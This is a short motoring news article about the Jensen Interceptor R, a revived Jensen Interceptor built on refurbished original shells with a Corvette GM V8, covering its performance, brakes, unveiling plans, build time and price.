With Italian good-looks, British craftsmanship and big-volume American muscle under the bonnet, it was a roaring, hairy chested misogynist of a car, but main production of it fizzled out in 1976.
Despite a few attempts to relaunch the model through the 80s and 90s, none really got off the ground, but we’re nevertheless excited by this new version.
The Jensen Interceptor R has been built by a new UK company – Jensen International Automotive – using refurbished original shells but modern grunt. Where the original car had a 6.2-litre Chrysler V8 (and later a 7.2-liter version), and put out 390bhp, the revamped Interceptor packs a very modern 6.2-litre GM V8 from a Corvette, and its 429bhp gives it a 0-100kph time of less than 4.5 seconds. That’s fast in anyone’s book. Uprated front suspension and modern AP Racing brakes ensure that this old beauty can cope with its up-to-date power.
The new car is due to be unveiled to the public at the swanky Salon Prive event in the UK during June, but with Britain baulking under high gas prices, we can’t help thinking that the export market could be very useful to JIA’s plans. Perhaps to somewhere where petrol is cheaper and there’s a fondness for big V8 engines. Like, say, the Middle East?
Each car is hand built and takes around five months to put together. The asking price in the UK starts at around $171,650.
